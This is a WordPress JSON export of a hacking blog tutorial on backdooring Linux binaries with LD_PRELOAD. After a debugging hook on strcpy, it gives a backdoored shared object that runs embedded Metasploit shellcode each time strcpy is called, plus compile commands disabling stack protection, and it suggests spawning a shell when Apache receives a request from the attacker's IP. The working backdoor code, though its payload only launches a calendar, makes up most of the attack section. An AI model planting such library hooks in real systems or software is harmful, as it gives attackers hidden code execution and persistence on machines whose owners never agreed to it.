{"id":1294,"date":"2016-07-31T17:35:02","date_gmt":"2016-07-31T17:35:02","guid":{"rendered":"http:\/\/www.gironsec.com\/blog\/?p=1294"},"modified":"2016-07-31T17:35:02","modified_gmt":"2016-07-31T17:35:02","slug":"backdooring-dlls-part-3","status":"publish","type":"post","link":"https:\/\/www.gironsec.com\/blog\/2016\/07\/backdooring-dlls-part-3\/","title":{"rendered":"Backdooring DLL&#8217;s Part 3"},"content":{"rendered":"<p>Whaddup fellow crackers. Long time, no see.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/1463353909015.jpg\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/1463353909015.jpg\" alt=\"1463353909015\" width=\"276\" height=\"280\" class=\"alignnone size-full wp-image-1305\" \/><\/a><\/p>\n<p>In this article, we&#8217;re going to do something I rarely bother with &#8211; Linux! <\/p>\n<p>Yes, you can backdoor Linux binaries quite easily. One method I like to use is via the LD_PRELOAD environment variable. Within the header file &#8220;dlfcn.h&#8221;, there exists a function named <a href=\"http:\/\/pubs.opengroup.org\/onlinepubs\/009695399\/functions\/dlsym.html\" target=\"_blank\">&#8216;dlsym&#8217;<\/a> which is used for obtaining the address of symbols. We can use this to hook shared library functions and add our own code to them. <\/p>\n<p>In the following example, I am hooking &#8216;strcpy&#8217; with a check to see if the destination buffer is large enough for the source. If it isn&#8217;t, rather than (potentially) crashing, my implementation prints what I want to the screen along with some backtrace info obtained from &#8216;execinfo.h&#8217;. Here is how we do it. <\/p>\n<p>First, paste this into your editor:<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #008800\">#define _GNU_SOURCE<\/span>\r\n<span style=\"color: #008800\">#include &lt;dlfcn.h&gt;<\/span>\r\n<span style=\"color: #008800\">#include &lt;execinfo.h&gt;<\/span>\r\n<span style=\"color: #008800\">#include &lt;stdio.h&gt;<\/span>\r\n<span style=\"color: #008800\">#include &lt;stdlib.h&gt;<\/span>\r\n\r\n<span style=\"color: #00BB00; font-weight: bold\">void<\/span> <span style=\"color: #00A000\">joetrace<\/span>(<span style=\"color: #00BB00; font-weight: bold\">void<\/span>);\r\n\r\n<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span><span style=\"color: #00A000\">strcpy<\/span>(<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>destination,  <span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>source )  \r\n{\r\n\r\n         <span style=\"color: #AA22FF; font-weight: bold\">if<\/span> (strlen(source) <span style=\"color: #666666\">&gt;<\/span> strlen(destination)) {\r\n                printf(<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\n<\/span><span style=\"color: #BB4444\">Found bug in [strcpy] call.  Source [%zu] Destination [%zu]<\/span><span style=\"color: #BB6622; font-weight: bold\">\\n<\/span><span style=\"color: #BB4444\">&quot;<\/span>, strlen(source), strlen(destination));\r\n                joetrace();\r\n        }\r\n\r\n        <span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>(<span style=\"color: #666666\">*<\/span>old_strcpy)(<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>dest, <span style=\"color: #AA22FF; font-weight: bold\">const<\/span> <span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>src);\r\n        old_strcpy <span style=\"color: #666666\">=<\/span> dlsym(RTLD_NEXT, <span style=\"color: #BB4444\">&quot;strcpy&quot;<\/span>);\r\n        <span style=\"color: #AA22FF; font-weight: bold\">return<\/span> (<span style=\"color: #666666\">*<\/span>old_strcpy)(destination, source);\r\n}\r\n\r\n<span style=\"color: #00BB00; font-weight: bold\">void<\/span> <span style=\"color: #00A000\">joetrace<\/span> (<span style=\"color: #00BB00; font-weight: bold\">void<\/span>)\r\n{\r\n  <span style=\"color: #00BB00; font-weight: bold\">void<\/span> <span style=\"color: #666666\">*<\/span>blox[<span style=\"color: #666666\">10<\/span>];\r\n  <span style=\"color: #00BB00; font-weight: bold\">size_t<\/span> mysize;\r\n  <span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">**<\/span>brix;\r\n  <span style=\"color: #00BB00; font-weight: bold\">size_t<\/span> i;\r\n  mysize <span style=\"color: #666666\">=<\/span> backtrace (blox, <span style=\"color: #666666\">10<\/span>);\r\n  brix <span style=\"color: #666666\">=<\/span> backtrace_symbols (blox, mysize);\r\n  printf (<span style=\"color: #BB4444\">&quot;I&#39;m seeing %zd stack frames.<\/span><span style=\"color: #BB6622; font-weight: bold\">\\n<\/span><span style=\"color: #BB4444\">&quot;<\/span>, mysize);\r\n\r\n        <span style=\"color: #AA22FF; font-weight: bold\">for<\/span> (i <span style=\"color: #666666\">=<\/span> <span style=\"color: #666666\">0<\/span>; i <span style=\"color: #666666\">&lt;<\/span> mysize; i<span style=\"color: #666666\">++<\/span>)\r\n        {\r\n        printf (<span style=\"color: #BB4444\">&quot;%s<\/span><span style=\"color: #BB6622; font-weight: bold\">\\n<\/span><span style=\"color: #BB4444\">&quot;<\/span>, brix[i]);\r\n        }\r\n  free(brix);\r\n}\r\n<\/pre>\n<\/div>\n<p>Now compile:<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\">joe@ubuntu:~\/Downloads<span style=\"color: #B8860B\">$ <\/span>gcc -shared -ldl -fPIC btrace.c -o btrace.so\r\n<\/pre>\n<\/div>\n<p>Now we need a testing program. Paste this into your editor.<\/p>\n<p><!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #008800\">#include &lt;stdio.h&gt;<\/span>\r\n<span style=\"color: #008800\">#include &lt;string.h&gt;<\/span>\r\n\r\n<span style=\"color: #00BB00; font-weight: bold\">int<\/span> <span style=\"color: #00A000\">main<\/span>(<span style=\"color: #00BB00; font-weight: bold\">void<\/span>)\r\n{\r\nprintf(<span style=\"color: #BB4444\">&quot;This better work...<\/span><span style=\"color: #BB6622; font-weight: bold\">\\r\\n<\/span><span style=\"color: #BB4444\">&quot;<\/span>);\r\n<span style=\"color: #00BB00; font-weight: bold\">char<\/span> joe[<span style=\"color: #666666\">10<\/span>] <span style=\"color: #666666\">=<\/span> <span style=\"color: #BB4444\">&quot;haha&quot;<\/span>;\r\n<span style=\"color: #00BB00; font-weight: bold\">char<\/span> why[<span style=\"color: #666666\">10<\/span>] <span style=\"color: #666666\">=<\/span> <span style=\"color: #BB4444\">&quot;hehey&quot;<\/span>;\r\nstrcpy(joe,why);\r\n}\r\n<\/pre>\n<\/div>\n<p>Compile&#8230;<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\">joe@ubuntu:~\/Downloads<span style=\"color: #B8860B\">$ <\/span>gcc testing123.c -o testing123\r\n<\/pre>\n<\/div>\n<p>Now we&#8217;re ready. Just need to set the LD_PRELOAD environment variable and run the program at the same time. Low and behold:<\/p>\n<p><!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\">joe<span style=\"color: #666666\">@<\/span>ubuntu:<span style=\"color: #666666\">~\/<\/span>Downloads<span style=\"border: 1px solid #FF0000\">$<\/span> LD_PRELOAD<span style=\"color: #666666\">=\/<\/span>home<span style=\"color: #666666\">\/<\/span>joe<span style=\"color: #666666\">\/<\/span>Downloads<span style=\"color: #666666\">\/<\/span>btrace.so .<span style=\"color: #666666\">\/<\/span>testing123\r\nThis better work...\r\n\r\nFound bug <span style=\"color: #AA22FF; font-weight: bold\">in<\/span> [strcpy] <span style=\"color: #AA22FF; font-weight: bold\">call<\/span>.  Source [<span style=\"color: #666666\">5<\/span>] Destination [<span style=\"color: #666666\">4<\/span>]\r\nI<span style=\"border: 1px solid #FF0000\">&#39;<\/span>m seeing <span style=\"color: #666666\">5<\/span> stack frames.\r\n<span style=\"color: #666666\">\/<\/span>home<span style=\"color: #666666\">\/<\/span>joe<span style=\"color: #666666\">\/<\/span>Downloads<span style=\"color: #666666\">\/<\/span>btrace.<span style=\"color: #00A000\">so<\/span>(joetrace<span style=\"color: #666666\">+0<\/span>x19) [<span style=\"color: #666666\">0<\/span>x7fe1699f6885]\r\n<span style=\"color: #666666\">\/<\/span>home<span style=\"color: #666666\">\/<\/span>joe<span style=\"color: #666666\">\/<\/span>Downloads<span style=\"color: #666666\">\/<\/span>btrace.<span style=\"color: #00A000\">so<\/span>(strcpy<span style=\"color: #666666\">+0<\/span>xd0) [<span style=\"color: #666666\">0<\/span>x7fe1699f683c]\r\n.<span style=\"color: #666666\">\/<\/span><span style=\"color: #00A000\">testing123<\/span>() [<span style=\"color: #666666\">0<\/span>x40060a]\r\n<span style=\"color: #666666\">\/<\/span>lib<span style=\"color: #666666\">\/<\/span>x86_64<span style=\"color: #666666\">-<\/span>linux<span style=\"color: #666666\">-<\/span>gnu<span style=\"color: #666666\">\/<\/span>libc.so.<span style=\"color: #666666\">6<\/span>(__libc_start_main<span style=\"color: #666666\">+0<\/span>xed) [<span style=\"color: #666666\">0<\/span>x7fe1696597ed]\r\n.<span style=\"color: #666666\">\/<\/span><span style=\"color: #00A000\">testing123<\/span>() [<span style=\"color: #666666\">0<\/span>x4004f9]\r\n<\/pre>\n<\/div>\n<p>This is useful if you want to test programs for buffer overflows, but what about backdooring? After all, that&#8217;s why we&#8217;re here right? All we have to do is modify our code before our call to &#8216;dlsym&#8217; and the return and place backdooring code inside. My motto has always been, why re-invent the wheel? Metasploit has lot&#8217;s of backdoor code. Hell, Metasploit is even nice enough to produce a C file output for our shellcode. Since we don&#8217;t need to evade anything or watch for null bytes, the process is simple.<\/p>\n<p>Step 1 &#8211; boot up metasploit, pick a payload.<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msf.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msf-300x190.png\" alt=\"msf\" width=\"300\" height=\"190\" class=\"alignnone size-medium wp-image-1296\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msf-300x190.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msf-768x485.png 768w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msf-1024x647.png 1024w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msf.png 1462w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p>In this case, I chose exec for Linux x64. I&#8217;m setting the CMD as \/usr\/bin\/cal (calendar). Now it&#8217;s just a matter of using the &#8216;generate&#8217; command and specifying C as the output language:<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msdf2.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msdf2.png\" alt=\"msdf2\" width=\"568\" height=\"308\" class=\"alignnone size-full wp-image-1299\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msdf2.png 568w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/msdf2-300x163.png 300w\" sizes=\"(max-width: 568px) 100vw, 568px\" \/><\/a><\/p>\n<p>We take our output, make it C ready, and place this inside our shared object and compile.<\/p>\n<p><!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\"><span style=\"color: #008800\">#define _GNU_SOURCE<\/span>\r\n<span style=\"color: #008800\">#include &lt;dlfcn.h&gt;<\/span>\r\n<span style=\"color: #008800\">#include &lt;stdio.h&gt;<\/span>\r\n<span style=\"color: #008800\">#include &lt;stdlib.h&gt;<\/span>\r\n\r\n<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span><span style=\"color: #00A000\">strcpy<\/span>(<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>destination,  <span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>source )  \r\n{\r\n<span style=\"color: #00BB00; font-weight: bold\">unsigned<\/span> <span style=\"color: #00BB00; font-weight: bold\">char<\/span> buf[] <span style=\"color: #666666\">=<\/span> \r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\x48\\x31\\xc9\\x48\\x81\\xe9\\xf9\\xff\\xff\\xff\\x48\\x8d\\x05\\xef\\xff<\/span><span style=\"color: #BB4444\">&quot;<\/span>\r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\xff\\xff\\x48\\xbb\\xce\\x62\\xd4\\x8c\\x11\\x28\\xd0\\x06\\x48\\x31\\x58<\/span><span style=\"color: #BB4444\">&quot;<\/span>\r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\x27\\x48\\x2d\\xf8\\xff\\xff\\xff\\xe2\\xf4\\xa4\\x59\\x8c\\x15\\x59\\x93<\/span><span style=\"color: #BB4444\">&quot;<\/span>\r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\xff\\x64\\xa7\\x0c\\xfb\\xff\\x79\\x28\\x83\\x4e\\x47\\x85\\xbc\\xa1\\x72<\/span><span style=\"color: #BB4444\">&quot;<\/span>\r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\x28\\xd0\\x4e\\x47\\x84\\x86\\x64\\x1c\\x28\\xd0\\x06\\xe1\\x17\\xa7\\xfe<\/span><span style=\"color: #BB4444\">&quot;<\/span>\r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\x3e\\x4a\\xb9\\x68\\xe1\\x01\\xb5\\xe0\\x11\\x7e\\x87\\x4e\\x47\\x84\\xdb<\/span><span style=\"color: #BB4444\">&quot;<\/span>\r\n<span style=\"color: #BB4444\">&quot;<\/span><span style=\"color: #BB6622; font-weight: bold\">\\x89\\x11\\x28\\xd0\\x06<\/span><span style=\"color: #BB4444\">&quot;<\/span>;\r\n\r\n<span style=\"color: #00BB00; font-weight: bold\">int<\/span> (<span style=\"color: #666666\">*<\/span>doit)() <span style=\"color: #666666\">=<\/span> (<span style=\"color: #00BB00; font-weight: bold\">int<\/span>(<span style=\"color: #666666\">*<\/span>)())buf;\r\ndoit();\r\n        \r\n<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>(<span style=\"color: #666666\">*<\/span>old_strcpy)(<span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>dest, <span style=\"color: #AA22FF; font-weight: bold\">const<\/span> <span style=\"color: #00BB00; font-weight: bold\">char<\/span> <span style=\"color: #666666\">*<\/span>src);\r\nold_strcpy <span style=\"color: #666666\">=<\/span> dlsym(RTLD_NEXT, <span style=\"color: #BB4444\">&quot;strcpy&quot;<\/span>);\r\n<span style=\"color: #AA22FF; font-weight: bold\">return<\/span> (<span style=\"color: #666666\">*<\/span>old_strcpy)(destination, source);\r\n}\r\n<\/pre>\n<\/div>\n<p>Compiling&#8230;.<br \/>\n<!-- HTML generated using hilite.me --><\/p>\n<div style=\"background: #f8f8f8; overflow:auto;width:auto;border:solid gray;border-width:.1em .1em .1em .8em;padding:.2em .6em;\">\n<pre style=\"margin: 0; line-height: 125%\">joe@ubuntu:~\/Downloads<span style=\"color: #B8860B\">$ <\/span>gcc -shared -ldl -fPIC -fno-stack-protector -z execstack backdoored_so.c -o backdoored_so.so\r\n<\/pre>\n<\/div>\n<p>Now we set our environment variable LD_PRELOAD again and run our program:<br \/>\n<a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/backdoored_shared_object.png\"><img decoding=\"async\" loading=\"lazy\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/backdoored_shared_object.png\" alt=\"backdoored_shared_object\" width=\"772\" height=\"220\" class=\"alignnone size-full wp-image-1300\" srcset=\"https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/backdoored_shared_object.png 772w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/backdoored_shared_object-300x85.png 300w, https:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/backdoored_shared_object-768x219.png 768w\" sizes=\"(max-width: 772px) 100vw, 772px\" \/><\/a><br \/>\nFantastico! The call to strcpy() was intercepted, and calendar was called. I used simple shellcode too. Imagine spawning a shell when apache accepts a recv() request from your IP? You&#8217;ll have to be creative.<\/p>\n<p>There are other ways of backdooring shared objects in Linux, but I wanted to share the hooking method. The way you hook a Linux shared object is about the same as part 1 when we went through a DLL file &#8211; just find the right export \/ function and replace codez. <\/p>\n<p>Tune in for part 4, the final chapter when I go over using hooking libraries to hook dll files on windows. We&#8217;ll be playing with HookLib and MS Detours again. <\/p>\n<p>Until then,<\/p>\n<p>Happy hacking!<\/p>\n<div style=\"width: 540px;\" class=\"wp-video\"><!--[if lt IE 9]><script>document.createElement('video');<\/script><![endif]-->\n<video class=\"wp-video-shortcode\" id=\"video-1294-1\" width=\"540\" height=\"260\" preload=\"metadata\" controls=\"controls\"><source type=\"video\/webm\" src=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/1413141603419.webm?_=1\" \/><a href=\"http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/1413141603419.webm\">http:\/\/www.gironsec.com\/blog\/wp-content\/uploads\/2016\/07\/1413141603419.webm<\/a><\/video><\/div>\n","protected":false},"excerpt":{"rendered":"<p>Whaddup fellow crackers. Long time, no see. In this article, we&#8217;re going to do something I rarely bother with &#8211; Linux! Yes, you can backdoor Linux binaries quite easily. One method I like to use is via the LD_PRELOAD environment variable. Within the header file &#8220;dlfcn.h&#8221;, there exists a function named &#8216;dlsym&#8217; which is used [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[4,7],"tags":[110,112],"_links":{"self":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1294"}],"collection":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/comments?post=1294"}],"version-history":[{"count":7,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1294\/revisions"}],"predecessor-version":[{"id":1380,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/posts\/1294\/revisions\/1380"}],"wp:attachment":[{"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/media?parent=1294"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/categories?post=1294"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.gironsec.com\/blog\/wp-json\/wp\/v2\/tags?post=1294"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}